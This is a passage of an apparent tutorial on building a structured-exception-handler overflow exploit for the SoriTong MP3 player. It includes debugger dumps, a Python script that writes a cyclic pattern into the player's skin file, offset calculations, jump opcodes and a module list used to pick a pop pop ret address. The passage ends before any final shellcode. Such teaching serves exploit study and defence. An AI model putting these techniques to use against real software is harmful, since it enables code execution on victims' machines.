0012febc 41414141 41414141 41414141 41414141 0x41414141
0012fec0 41414141 41414141 41414141 41414141 0x41414141
0012fec4 41414141 41414141 41414141 41414141 0x41414141
0012fec8 41414141 41414141 41414141 41414141 0x41414141
0012fecc 41414141 41414141 41414141 41414141 0x41414141
0012fed0 41414141 41414141 41414141 41414141 0x41414141
0012fed4 41414141 41414141 41414141 41414141 0x41414141
0012fed8 41414141 41414141 41414141 41414141 0x41414141
0012fedc 41414141 41414141 41414141 41414141 0x41414141
0012fee0 41414141 41414141 41414141 41414141 0x41414141
0012fee4 41414141 41414141 41414141 41414141 0x41414141
0012fee8 41414141 41414141 41414141 41414141 0x41414141
0012feec 41414141 41414141 41414141 41414141 0x41414141
0012fef0 41414141 41414141 41414141 41414141 0x41414141
0012fef4 41414141 41414141 41414141 41414141 0x41414141
0012fef8 41414141 41414141 41414141 41414141 0x41414141
0012fefc 41414141 41414141 41414141 41414141 0x41414141
0012ff00 41414141 41414141 41414141 41414141 0x41414141
0012ff04 41414141 41414141 41414141 41414141 0x41414141
0012ff08 41414141 41414141 41414141 41414141 0x41414141
0012ff0c 41414141 41414141 41414141 41414141 0x41414141
0012ff10 41414141 41414141 41414141 41414141 0x41414141
0012ff14 41414141 41414141 41414141 41414141 0x41414141
0012ff18 41414141 41414141 41414141 41414141 0x41414141
0012ff1c 41414141 41414141 41414141 41414141 0x41414141
0012ff20 41414141 41414141 41414141 41414141 0x41414141
0012ff24 41414141 41414141 41414141 41414141 0x41414141
0012ff28 41414141 41414141 41414141 41414141 0x41414141
0012ff2c 41414141 41414141 41414141 41414141 0x41414141
0012ff30 41414141 41414141 41414141 41414141 0x41414141
0012ff34 41414141 41414141 41414141 41414141 0x41414141
0012ff38 41414141 41414141 41414141 41414141 0x41414141
0012ff3c 41414141 41414141 41414141 41414141 0x41414141
0012ff40 41414141 41414141 41414141 41414141 0x41414141
0012ff44 41414141 41414141 41414141 41414141 0x41414141
0012ff48 41414141 41414141 41414141 41414141 0x41414141
0012ff4c 41414141 41414141 41414141 41414141 0x41414141
0012ff50 41414141 41414141 41414141 41414141 0x41414141
0012ff54 41414141 41414141 41414141 41414141 0x41414141
0012ff58 41414141 41414141 41414141 41414141 0x41414141
0012ff5c 41414141 41414141 41414141 41414141 0x41414141
0012ff60 41414141 41414141 41414141 41414141 0x41414141
0012ff64 41414141 41414141 41414141 41414141 0x41414141
0012ff68 41414141 41414141 41414141 41414141 0x41414141
0012ff6c 41414141 41414141 41414141 41414141 0x41414141
0012ff70 41414141 41414141 41414141 41414141 0x41414141
0012ff74 41414141 41414141 41414141 41414141 0x41414141
0012ff78 41414141 41414141 41414141 41414141 0x41414141
0012ff7c 41414141 41414141 41414141 41414141 0x41414141
0012ff80 41414141 41414141 41414141 41414141 0x41414141
0012ff84 41414141 41414141 41414141 41414141 0x41414141
0012ff88 41414141 41414141 41414141 41414141 0x41414141
0012ff8c 41414141 41414141 41414141 41414141 0x41414141
0012ff90 41414141 41414141 41414141 41414141 0x41414141
0012ff94 41414141 41414141 41414141 41414141 0x41414141
0012ff98 41414141 41414141 41414141 41414141 0x41414141
0012ff9c 41414141 41414141 41414141 41414141 0x41414141
0012ffa0 41414141 41414141 41414141 41414141 0x41414141
0012ffa4 41414141 41414141 41414141 41414141 0x41414141
0012ffa8 41414141 41414141 41414141 41414141 0x41414141
0012ffac 41414141 41414141 41414141 41414141 0x41414141
0012ffb0 41414141 41414141 41414141 41414141 0x41414141
0012ffb4 41414141 41414141 41414141 41414141 0x41414141
0012ffb8 41414141 41414141 41414141 41414141 0x41414141
0012ffbc 41414141 41414141 41414141 41414141 0x41414141
0012ffc0 41414141 41414141 41414141 41414141 0x41414141
0012ffc4 41414141 41414141 41414141 41414141 0x41414141
0012ffc8 41414141 41414141 41414141 41414141 0x41414141
0012ffcc 41414141 41414141 41414141 41414141 0x41414141
0012ffd0 41414141 41414141 41414141 41414141 0x41414141
0012ffd4 41414141 41414141 41414141 41414141 0x41414141
0012ffd8 41414141 41414141 41414141 41414141 0x41414141
0012ffdc 41414141 41414141 41414141 41414141 0x41414141
0012ffe0 41414141 41414141 41414141 41414141 0x41414141
0012ffe4 41414141 41414141 41414141 41414141 0x41414141
0012ffe8 41414141 41414141 41414141 41414141 0x41414141
0012ffec 41414141 41414141 41414141 41414141 0x41414141
0012fff0 41414141 41414141 41414141 78746341 0x41414141
0012fff4 41414141 41414141 78746341 00000020 0x41414141
0012fff8 41414141 78746341 00000020 00000001 0x41414141
0012fffc 78746341 00000020 00000001 00002498 0x41414141
0012fffc 00000000 00000020 00000001 00002498 0x78746341


SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  soritong!TmC13_5+3ea3

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: SoriTong

IMAGE_NAME:  SoriTong.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  37dee000

STACK_COMMAND:  ~0s ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_SoriTong.exe!TmC13_5

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_soritong!TmC13_5+3ea3

Followup: MachineOwner
---------

The exception record points at ffffffff, which means that the application did not use an exception handler for this overflow (and the “last resort” handler was used, which is provided for by the OS).
When you dump the TEB after the exception occurred, you see this :

0:000> d fs:[0]
003b:00000000  64 fd 12 00 00 00 13 00-00 c0 12 00 00 00 00 00 d...............
003b:00000010  00 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00 ................
003b:00000020  0c 0e 00 00 10 0e 00 00-00 00 00 00 08 2a 14 00 .............*..
003b:00000030  00 d0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040  a0 02 ed e1 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

=> pointer to the SEH chain, at 0x0012FD64. That area now contains A’s

0:000> d 0x0012FD64
0012fd64  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fd74  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fd84  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fd94  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fda4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fdb4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fdc4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fdd4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

The exception chain says :

0:000> !exchain
0012fd64: 41414141
Invalid exception stack at 41414141

=> so we have overwritten the exception handler. Now let the appliation catch the exception (simply type ‘g’ again in windbg, or press F5) and let’ see what happens :

0:000> g
(e0c.e10): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012d644 ebp=0012d664 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???

eip now points to 41414141, so we can control EIP.
The exchain now reports

0:000> !exchain
0012d658: ntdll!ExecuteHandler2+3a (7c9032bc)
0012fd64: 41414141
Invalid exception stack at 41414141

Microsoft has released a windbg extension called !exploitable. Download the package, and put the dll file in the windbg program folder, inside the winext subfolder.

Can I use the shellcode found in the registers to jump to ?

Yes and no. Before Windows XP SP1, you could jump directly to these registers in order to execute the shellcode. But from SP1 and up, a protection mechanism has been plut in place to protect things like that from happening. Before the exception handler takes control, all registers are XOred with each other, so they all point to 0x00000000 That way, when SEH kicks in, the registers are useless.

Advantages of SEH Based Exploits over RET (direct EIP) overwrite stack overflows

n a typical RET overflow, you overwrite EIP and make it jump to your shellcode. This technique works well, but may cause stability issues (if you cannot find a jmp instruction in a dll, or if you need to hardcode addresses), and it may also suffer from buffer size problems, limiting the amount of space available to host your shellcode.
It’s often worth while, every time you have discovered a stack based overflow and found that you can overwrite EIP, to try to write further down the stack to try to hit the SEH chain. “Writing further down” means that you will likely end up with more available buffer space; and since you would be overwriting EIP at the same time (with garbage), an exception would be triggered automatically, converting the ‘classic’ exploit into a SEH exploit.

Then how can we exploit SEH based vulnerabilities ?

Easy. In SEH based exploits, your junk payload will first overwrite the next SEH pointer address, then the SE Handler. Next, put your shellcode.
When the exception occurs, the application will go to the SE Handler. So you need to put something in the SE Handler so it would go to your shellcode. This is done by faking a second exception, so the application goes to the next SEH pointer.
Since the next SEH pointer sits before the SE Handler, you can already overwritten the next SEH. The shellcode sits after the SE Handler. If you put one and one together, you can trick SE Handler to run pop pop ret, which will put the address to next SEH in EIP, and that will execute the code in next SEH. (So instead of putting an address in next SEH, you put some code in next SEH). All this code needs to do is jump over the next couple of bytes (where SE Handler is stored) and your shellcode will be executed

1st exception occurs :
 |
 --------------------------- (1)
                            |
                     -------+-------------- (3) opcode in next SEH : jump over SE Handler to the shellcode
                     |      |             |
                     |      V             V
______________________________________________________
[ Junk buffer ][ next SEH ][ SE Handler ][ Shellcode ]
                opcode to   do                 (3) Shellcode gets executed
                jump over   pop pop ret
                SE Handler   |
                ^            |
                |            |
                -------------- (2) will ‘pretend’ there’s a second exception, puts address of next SEH location in EIP, so opcode gets executed

Of course, the shellcode may not be right after overwriting SE Handler… or there may be some additional garbage at the first couple of bytes… It’s important to verify that you can locate the shellcode and that you can properly jump to the shellcode.

How can you find the shellcode with SEH based exploits ?

First, find the offset to next SEH and SEH, overwrite SEH with a pop pop ret, and put breakpoints in next SEH. This will make the application break when the exception occurs, and then you can look for the shellcode. See the sections below on how to do this.

Building the exploit – Find the “next SEH” and “SE Handler” offsets

to the place where we will overwrite the next SEH (with jump to shellcode)
to the place where we will overwrite the current SE Handler (should be right after the “next SEH” (we need to overwrite this something that will bring us back at next SEH)
to the shellcode

A simple way to do this is by filling the payload with an unique pattern (metasploit rulez again), and then looking for these 3 locations.

#!/usr/bin/env python
# -*- coding: utf8 -*-

data = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"

f = open("C:\Program Files\SoriTong\Skin\Default\UI.txt", 'w')
f.write(data)
f.close()

Create the ui.txt file.
Open windbg, open the soritong.exe executable. It will start paused, so launch it. The debugger will catch the first chance exception. Don’t let it run further allowing the applicaiton to catch the exception, as it would change the entire stack layout. Just keep the debugger paused and look at the seh chain :

0:000> !exchain
0012fd64: 41367441
Invalid exception stack at 35744134

0012FD64   35744134  4At5  Pointer to next SEH record
0012FD68   41367441  At6A  SE handler
0012FD6C   74413774  t7At
0012FD70   39744138  8At9
0012FD74   41307541  Au0A
0012FD78   75413175  u1Au
0012FD7C   33754132  2Au3
0012FD80   41347541  Au4A
0012FD84   75413575  u5Au

Pointer to next SEH record is overwritten after 584 bytes. This location is 0x0012FD64 (as shown at the !exchain output)

lab:tools/ $ ./pattern_offset.rb 4At5 5000
[*] Exact match at offset 584

We know that our shellcode sits right after overwriting the SE Handler. So the shellcode must be placed at 0x0012FD64+4bytes+4bytes

[Junk][next SEH][SEH][Shellcode]

Goal : The exploit triggers an exception, goes to SEH, which will trigger another exception (pop pop ret). This will make the flow jump back to next SEH. So all we need to tell “next SEH” is “jump over the next couple of bytes and you’ll end up in the shellcode”. 6 bytes (or more, if you start the shellcode with a bunch of NOPs) will do just fine.
The opcode for a short jump is eb, followed by the jump distance. In other words, a short jump of 6 bytes corresponds with opcode eb 06. We need to fill 4 bytes, so we must add 2 NOP’s to fill the 4 byte space. So the next SEH field must be overwritten with

0xeb,0x06,0x90,0x90

How exactly does the pop pop ret function when working with SEH based exploits?

When an exception occurs, the exception dispatcher creates its own stack frame. It will push elements from the EH Handler on to the newly created stack (as part of a function prologue). One of the fields in the EH Structure is the EstablisherFrame. This field points to the address of the exception registration record (the next SEH) that was pushed onto the program stack. This same address is also located at ESP+8 when the handler is called. Now if we overwrite the handler with the address of a pop pop ret sequence :

the first pop will take off 4 bytes from the stack
the second pop will take another 4 bytes from the stack
the ret will take the current value from the top of ESP ( = the address of the next SEH, which was at ESP+8, but because of the 2 pop’s now sits at the top of the stack) and puts that in EIP.

We have overwritten the next SEH with some basic jumpcode (instead of an address), so the code gets executed. In fact, the next SEH field can be considered as the first part of our shellcode (jumpcode).

Building the exploit – putting all pieces together

After having found the important offsets, we only need the the address of a pop pop ret before we can build the exploit.
When launching Soritong MP3 player in windbg, we can see the list of loaded modules :

Executable modules
Base       Size       Entry                       Name     (system  File version               Path
00400000   000DE000   00401000 SoriTong.<ModuleE  SoriTong                                     C:\Program Files\SoriTong\SoriTong.exe
00EB0000   0004F000   00ED8870 DRMClien.<ModuleE  DRMClien (system  9.00.00.4503               C:\WINDOWS\system32\DRMClien.DLL
10000000   00094000   100131B0 Player.<ModuleEnt  Player                                       C:\Program Files\SoriTong\Player.dll
42100000   00029000   4211AD40 wmaudsdk.<ModuleE  wmaudsdk (system  4.00.0.3845                C:\WINDOWS\system32\wmaudsdk.dll
5BC60000   0003F000   5BC95A00 strmdll.<ModuleEn  strmdll  (system  4.1.00.3936                C:\WINDOWS\system32\strmdll.dll
5D090000   0009A000   5D0934BA COMCTL32.<ModuleE  COMCTL32 (system  5.82 (xpsp.080413-2105)    C:\WINDOWS\system32\COMCTL32.dll
71AA0000   00008000   71AA1638 WS2HELP.<ModuleEn  WS2HELP  (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\WS2HELP.dll
71AB0000   00017000   71AB1273 WS2_32.<ModuleEnt  WS2_32   (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\WS2_32.dll
71AD0000   00009000   71AD1039 WSOCK32.<ModuleEn  WSOCK32  (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\WSOCK32.dll
72D10000   00008000   72D12575 msacm32.<ModuleEn  msacm32  (system  5.1.2600.0 (xpclient.0108  C:\WINDOWS\system32\msacm32.drv
72D20000   00009000   72D243CD wdmaud.<ModuleEnt  wdmaud   (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\wdmaud.drv
73000000   00026000   730054A5 WINSPOOL.<ModuleE  WINSPOOL (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\WINSPOOL.DRV
763B0000   00049000   763B1619 COMDLG32.<ModuleE  COMDLG32 (system  6.00.2900.5512 (xpsp.0804  C:\WINDOWS\system32\COMDLG32.dll
76B40000   0002D000   76B42B61 WINMM.<ModuleEntr  WINMM    (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\WINMM.dll
76C30000   0002E000   76C31529 WINTRUST.<ModuleE  WINTRUST (system  5.131.2600.5512 (xpsp.080  C:\WINDOWS\system32\WINTRUST.dll
76C90000   00028000   76C9126D IMAGEHLP.<ModuleE  IMAGEHLP (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\IMAGEHLP.dll
76E80000   0000E000   76E81BAD rtutils.<ModuleEn  rtutils  (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\rtutils.dll
76EB0000   0002F000   76EB13A0 TAPI32.<ModuleEnt  TAPI32   (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\TAPI32.dll
77120000   0008B000   77121560 OLEAUT32.<ModuleE  OLEAUT32 (system  5.1.2600.5512              C:\WINDOWS\system32\OLEAUT32.dll
773D0000   00103000   773D4256 comctl_1.<ModuleE  comctl_1          6.0 (xpsp.080413-2105)     C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
774E0000   0013D000   774FD0B9 OLE32.<ModuleEntr  OLE32    (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\OLE32.dll
77A80000   00095000   77A81632 CRYPT32.<ModuleEn  CRYPT32  (system  5.131.2600.5512 (xpsp.080  C:\WINDOWS\system32\CRYPT32.dll
77B20000   00012000   77B23399 MSASN1.<ModuleEnt  MSASN1   (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\MSASN1.dll
77BD0000   00007000   77BD33BD midimap.<ModuleEn  midimap  (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\midimap.dll
77BE0000   00015000   77BE1292 MSACM3_1.<ModuleE  MSACM3_1 (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\MSACM32.dll
77C00000   00008000   77C01135 VERSION.<ModuleEn  VERSION  (system  5.1.2600.5512 (xpsp.08041  C:\WINDOWS\system32\VERSION.dll
77C10000   00058000   77C1F2A1 msvcrt.<ModuleEnt  msvcrt   (system  7.0.2600.5512 (xpsp.08041  C:\WINDOWS\system32\msvcrt.dll
